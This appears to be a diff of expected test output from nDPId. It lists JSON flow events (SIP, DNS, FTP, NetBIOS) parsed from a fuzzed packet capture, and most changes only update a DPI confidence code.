+00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120471001263,"flow_last_seen":1120471001263,"flow_idle_time":200000,"flow_min_l4_payload_len":464,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":464,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.234.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1120470796941,"flow_last_seen":1120471094413,"flow_idle_time":200000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":1065,"flow_tot_l4_payload_len":10425,"flow_avg_l4_payload_len":453,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470831403,"flow_last_seen":1120470831403,"flow_idle_time":620000,"flow_min_l4_payload_len":474,"flow_max_l4_payload_len":474,"flow_tot_l4_payload_len":474,"flow_avg_l4_payload_len":474,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","l4_proto":0,"ndpi": {"proto":"Unknown","breed":"Unrated"}} 00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470831403,"flow_last_seen":1120470831403,"flow_idle_time":620000,"flow_min_l4_payload_len":474,"flow_max_l4_payload_len":474,"flow_tot_l4_payload_len":474,"flow_avg_l4_payload_len":474,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","l4_proto":0,"flow_datalink":1,"flow_max_packets":3} -00807{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120471065349,"flow_last_seen":1120471065349,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2572,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00807{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120471065349,"flow_last_seen":1120471065349,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2572,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00828{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635046,"flow_last_seen":1120469635046,"flow_idle_time":7580000,"flow_min_l4_payload_len":3,"flow_max_l4_payload_len":3,"flow_tot_l4_payload_len":3,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.2","src_port":21,"dst_port":2208,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}} 00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635046,"flow_last_seen":1120469635046,"flow_idle_time":7580000,"flow_min_l4_payload_len":3,"flow_max_l4_payload_len":3,"flow_tot_l4_payload_len":3,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.2","src_port":21,"dst_port":2208,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00607{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635173,"flow_last_seen":1120469635173,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.232.1.2","src_port":58999,"dst_port":2721,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} @@ -1378,29 +1378,29 @@ 00607{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635129,"flow_last_seen":1120469635129,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"147.234.1.253","src_port":2721,"dst_port":58999,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635129,"flow_last_seen":1120469635129,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"147.234.1.253","src_port":2721,"dst_port":58999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471086377,"flow_last_seen":1120471086377,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"116.168.1.2","dst_ip":"192.168.1.1","src_port":2829,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470916875,"flow_last_seen":1120470916875,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.233.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2811,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470916875,"flow_last_seen":1120470916875,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.233.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2811,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470916873,"flow_last_seen":1120470916873,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2811,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120470949427,"flow_last_seen":1120470958433,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2812,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470966440,"flow_last_seen":1120470966440,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2813,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470966852,"flow_last_seen":1120470975858,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2814,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00807{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470983860,"flow_last_seen":1120470983860,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2815,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00807{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470983860,"flow_last_seen":1120470983860,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2815,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120470983999,"flow_last_seen":1120470993243,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2816,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471001245,"flow_last_seen":1120471001245,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2822,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120471001714,"flow_last_seen":1120471010718,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2823,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120471018720,"flow_last_seen":1120471018721,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2824,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120471018720,"flow_last_seen":1120471018721,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2824,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1120471019307,"flow_last_seen":1120471028313,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":220,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2825,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120471036315,"flow_last_seen":1120471036317,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2826,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120471036315,"flow_last_seen":1120471036317,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2826,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471049334,"flow_last_seen":1120471049334,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2827,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471048339,"flow_last_seen":1120471048339,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.114","src_port":2827,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471065347,"flow_last_seen":1120471065347,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2828,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471082371,"flow_last_seen":1120471082371,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.54.2","dst_ip":"192.168.1.1","src_port":2829,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120471077370,"flow_last_seen":1120471078365,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2829,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1120471084097,"flow_last_seen":1120471088463,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2830,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120471094410,"flow_last_seen":1120471094412,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2831,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1120471084097,"flow_last_seen":1120471088463,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2830,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120471094410,"flow_last_seen":1120471094412,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2831,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471107427,"flow_last_seen":1120471107427,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2832,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00606{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635152,"flow_last_seen":1120469635152,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"37.115.0.253","dst_ip":"192.168.1.2","src_port":58999,"dst_port":2721,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635152,"flow_last_seen":1120469635152,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"37.115.0.253","dst_ip":"192.168.1.2","src_port":58999,"dst_port":2721,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470971822,"flow_last_seen":1120470971822,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.37","src_port":29440,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470971822,"flow_last_seen":1120470971822,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.37","src_port":29440,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 